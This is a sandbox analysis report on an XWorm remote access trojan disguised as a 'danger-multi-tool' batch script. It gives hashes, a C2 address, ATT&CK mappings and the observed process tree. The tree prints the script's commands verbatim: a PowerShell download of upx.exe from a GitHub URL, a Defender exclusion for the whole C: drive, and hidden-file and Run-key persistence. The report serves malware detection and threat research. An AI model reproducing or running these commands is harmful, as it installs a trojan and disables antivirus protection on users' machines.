xworm | c0c791bebc9acf7f1b1202a32a621adead08aff49252dfab9363b268d680b235

Analysis

max time kernel
291s
max time network
300s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
03-12-2024 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

danger-multi-tool-main/start.bat
Size

30KB
MD5

7ba955995f65ce6b05a74ee4515749cb
SHA1

2710d30d8077a3c72cd819fbe7cc8b52188b57db
SHA256

eaf6f1b53d2b7e04b7a1250ccae7fa440fef762b243b58de3fad89d797143cc7
SHA512

6d4b7be5872b6762e922c925e9566d3751ad0bf5f745f00462c6c6c5e98bacc14e2bd16ef379bcf4d75167aeb088571efe957279d3b330e864ef439e743da2ac
SSDEEP

48:9gros7BK7cp3zI8FpIJp/4eai2gF9H2YHwvfol2+:9gO4dI8ihXf

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

45.83.246.140:30120

Attributes

Install_directory
%AppData%
install_file
runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x0005000000044407-375.dat	family_xworm
behavioral3/memory/3884-386-0x0000000000D80000-0x0000000000D98000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	4352	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4352	powershell.exe
4700	powershell.exe
2156	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	upx.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe

Executes dropped EXE 2 IoCs

pid	Process
3744	upx.exe
3884	pack.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtime = "C:\\Users\\Admin\\AppData\\Roaming\\runtime.exe"	pack.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
65	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\.py	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\멨醂є踀\ = "py_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\py_auto_file\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\py_auto_file\shell\open\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\py_auto_file\shell\open\command\ = "\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\py_auto_file	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\.py\ = "py_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\멨醂є踀	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\py_auto_file\shell	OpenWith.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3884	pack.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4700	powershell.exe
4700	powershell.exe
2156	powershell.exe
2156	powershell.exe
4352	powershell.exe
4352	powershell.exe
3744	upx.exe
3884	pack.exe
3884	pack.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1196	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeIncreaseQuotaPrivilege	2156	powershell.exe
Token: SeSecurityPrivilege	2156	powershell.exe
Token: SeTakeOwnershipPrivilege	2156	powershell.exe
Token: SeLoadDriverPrivilege	2156	powershell.exe
Token: SeSystemProfilePrivilege	2156	powershell.exe
Token: SeSystemtimePrivilege	2156	powershell.exe
Token: SeProfSingleProcessPrivilege	2156	powershell.exe
Token: SeIncBasePriorityPrivilege	2156	powershell.exe
Token: SeCreatePagefilePrivilege	2156	powershell.exe
Token: SeBackupPrivilege	2156	powershell.exe
Token: SeRestorePrivilege	2156	powershell.exe
Token: SeShutdownPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeSystemEnvironmentPrivilege	2156	powershell.exe
Token: SeRemoteShutdownPrivilege	2156	powershell.exe
Token: SeUndockPrivilege	2156	powershell.exe
Token: SeManageVolumePrivilege	2156	powershell.exe
Token: 33	2156	powershell.exe
Token: 34	2156	powershell.exe
Token: 35	2156	powershell.exe
Token: 36	2156	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	3744	upx.exe
Token: SeIncreaseQuotaPrivilege	3744	upx.exe
Token: SeSecurityPrivilege	3744	upx.exe
Token: SeTakeOwnershipPrivilege	3744	upx.exe
Token: SeLoadDriverPrivilege	3744	upx.exe
Token: SeSystemProfilePrivilege	3744	upx.exe
Token: SeSystemtimePrivilege	3744	upx.exe
Token: SeProfSingleProcessPrivilege	3744	upx.exe
Token: SeIncBasePriorityPrivilege	3744	upx.exe
Token: SeCreatePagefilePrivilege	3744	upx.exe
Token: SeBackupPrivilege	3744	upx.exe
Token: SeRestorePrivilege	3744	upx.exe
Token: SeShutdownPrivilege	3744	upx.exe
Token: SeDebugPrivilege	3744	upx.exe
Token: SeSystemEnvironmentPrivilege	3744	upx.exe
Token: SeRemoteShutdownPrivilege	3744	upx.exe
Token: SeUndockPrivilege	3744	upx.exe
Token: SeManageVolumePrivilege	3744	upx.exe
Token: 33	3744	upx.exe
Token: 34	3744	upx.exe
Token: 35	3744	upx.exe
Token: 36	3744	upx.exe
Token: SeDebugPrivilege	4216	firefox.exe
Token: SeDebugPrivilege	4216	firefox.exe
Token: SeIncreaseQuotaPrivilege	3744	upx.exe
Token: SeSecurityPrivilege	3744	upx.exe
Token: SeTakeOwnershipPrivilege	3744	upx.exe
Token: SeLoadDriverPrivilege	3744	upx.exe
Token: SeSystemProfilePrivilege	3744	upx.exe
Token: SeSystemtimePrivilege	3744	upx.exe
Token: SeProfSingleProcessPrivilege	3744	upx.exe
Token: SeIncBasePriorityPrivilege	3744	upx.exe
Token: SeCreatePagefilePrivilege	3744	upx.exe
Token: SeBackupPrivilege	3744	upx.exe
Token: SeRestorePrivilege	3744	upx.exe
Token: SeShutdownPrivilege	3744	upx.exe
Token: SeDebugPrivilege	3744	upx.exe
Token: SeSystemEnvironmentPrivilege	3744	upx.exe
Token: SeRemoteShutdownPrivilege	3744	upx.exe
Token: SeUndockPrivilege	3744	upx.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe
4216	firefox.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
1196	OpenWith.exe
4216	firefox.exe
3884	pack.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 2944	1036	cmd.exe	81
PID 1036 wrote to memory of 2944	1036	cmd.exe	81
PID 1036 wrote to memory of 4700	1036	cmd.exe	83
PID 1036 wrote to memory of 4700	1036	cmd.exe	83
PID 1036 wrote to memory of 2576	1036	cmd.exe	84
PID 1036 wrote to memory of 2576	1036	cmd.exe	84
PID 1036 wrote to memory of 2156	1036	cmd.exe	85
PID 1036 wrote to memory of 2156	1036	cmd.exe	85
PID 1036 wrote to memory of 5024	1036	cmd.exe	87
PID 1036 wrote to memory of 5024	1036	cmd.exe	87
PID 1036 wrote to memory of 4352	1036	cmd.exe	88
PID 1036 wrote to memory of 4352	1036	cmd.exe	88
PID 1036 wrote to memory of 3744	1036	cmd.exe	89
PID 1036 wrote to memory of 3744	1036	cmd.exe	89
PID 1036 wrote to memory of 4828	1036	cmd.exe	90
PID 1036 wrote to memory of 4828	1036	cmd.exe	90
PID 1196 wrote to memory of 4000	1196	OpenWith.exe	95
PID 1196 wrote to memory of 4000	1196	OpenWith.exe	95
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4000 wrote to memory of 4216	4000	firefox.exe	97
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98
PID 4216 wrote to memory of 1020	4216	firefox.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5024	attrib.exe
4828	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\start.bat"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Windows\system32\mode.com
  mode con: cols=100 lines=30
  2⤵
  PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:5024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- C:\Users\Admin\AppData\Local\Anon\upx.exe
  upx.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3744
- - C:\Users\Admin\AppData\Local\Temp\pack.exe
    "C:\Users\Admin\AppData\Local\Temp\pack.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3884
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:4828

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\main.py"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\main.py
    3⤵
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c41d1e1b-f026-4e9d-a4cc-d3f8a2cb8843} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" gpu
      4⤵
      PID:1020
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24601 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46a09243-9486-4214-8560-adb164da5b91} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" socket
      4⤵
      PID:4472
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 2892 -prefMapHandle 2940 -prefsLen 24742 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75145fad-110b-4d97-a7e5-94533455c55f} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" tab
      4⤵
      PID:4388
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3620 -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 3632 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6af46bb5-49b6-4aea-ae36-ef64180966b9} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" tab
      4⤵
      PID:3144
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5072 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 2800 -prefMapHandle 2796 -prefsLen 29198 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74bb181f-8bb0-4198-8218-e4fd277b7922} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" utility
      4⤵
      Checks processor information in registry
      PID:5692
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5220 -childID 3 -isForBrowser -prefsHandle 4620 -prefMapHandle 2800 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {067d1914-ebe8-49be-8c05-43d45c260c5f} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" tab
      4⤵
      PID:5868
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 5376 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fe7cea5-a37b-4f35-8576-93a2bbd219c6} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" tab
      4⤵
      PID:5920
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5528 -childID 5 -isForBrowser -prefsHandle 5536 -prefMapHandle 5540 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f885ac8d-5084-4830-83e7-d83ed982bcaf} 4216 "\\.\pipe\gecko-crash-server-pipe.4216" tab
      4⤵
      PID:5940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Anon\upx.exe

Filesize
33KB

MD5
1583e6e87225b41e7d51f26c93486bf2

SHA1
af26d91d7824d77485c32d361740791239fc197d

SHA256
88ecbc963b0baf145353446e9797ab18140c0db8e919dadb0a4a65717899f3ec

SHA512
8630e00648452e1660a15ed4fbb8fe3000895b9f5cea0bd6e95f703811c755d2a6c0e19d29b17f44e0b509236d3ebc5265d3129e4289188abd8ba1eddc74643c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
e30544e6d048b2c1c6129c89835c16dd

SHA1
21d167ff64825d3f8a5c351c3160b670dc14cb60

SHA256
df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

SHA512
fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hohja4eo.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl.tmp

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vhvosml.ygp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pack.exe

Filesize
69KB

MD5
a230d428e97911ce6959e1463d781257

SHA1
0946c13059bf98fd3aacefd0b2681a42b95292cd

SHA256
c8e088feb7de05c3852af588c1a440f61d06870a93b07a3c6b7e2c12c9d55b12

SHA512
089f7f6e979729ba037a19510be160d1c407c712fa01614815ce2427ff6c8fe7fa80a2cb673a36611dc37734aba63f7c87832c3848ac9ce011343c0e15b7aa68

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9H7QN2WIJPHCKG4CH6UW.temp

Filesize
7KB

MD5
bbf1f96ed039b0ab0618e383eb7551f4

SHA1
2041d9c49f900eba9369727c9ad358abb7e324ac

SHA256
d8f45eba4765a7c8a30d6a21bb2f6f0e104261171424c1380eacbe5017daeb0a

SHA512
649b04ae5430f7fba8f95c42573319cba76783cc799b49be4814fbdb63470907829570f8eebac938257ef4943d050049a1ca42fb55e23d124f7ecbbf2401de7a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\AlternateServices.bin

Filesize
8KB

MD5
674464f7869bb846e616e0cf9a6196a5

SHA1
a8db29278a5de5a67078c1cb68b3be81bafd6a64

SHA256
68491c3a93a52a3e5c079082fe679671e084c2f09b31244b9d17f765d4548a40

SHA512
3a3342a3e124a2b09dcf80cba160fcb40d97f188641db97ea289cec30278bbd4fb5442e5cafa5ef43bb2bbfb47451c0410d70f70c09c6b1769412d12a7b562d0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\bookmarkbackups\bookmarks-2024-12-03_11_lfA1i+n6EsVk6QdOxBxTGw==.jsonlz4

Filesize
1016B

MD5
29279a042459171f270efe60e8a04899

SHA1
e5ff657c374b68b6488a7ad2e9d6e8adbbb67d8e

SHA256
d98c4d5c20645cdb8bbb2a48cbf2fd7e9dea3416d7408950935c888ac0ef5e11

SHA512
67e7d23b660cbd977f500c1855606784604d6e4133f780d8196a794d013076196efd6c3c4a7c1693b38ec32f18f56d294250c998c3a39696bfdcbe638b309964

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
c02d675e3c8fdd557c92a58d95983b38

SHA1
40f43c2f51bbf8350efa8e6f085e2ca8557cb022

SHA256
54b96389135df3f1f26bd5d58fc7cffe33312a3350890342fe7eb9e0a56e59a3

SHA512
5b6e68707cc1c9f0bd9fcdee350f4dc57fdbd265d48dc6d4d7e26f3f7d709c87135d02bba23dbba7dc27a22bb2ba2e4e75bffa8d37a2c52baa64feead0b1449a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
cc3f8c2b9f85f966e2aab639adddb719

SHA1
9a05e8447ef7388403f4df1018fb5e833a961f0e

SHA256
fd036bace312ff55dd119be289b077a43adc3eebe84f341ef277d6217e7a2f9b

SHA512
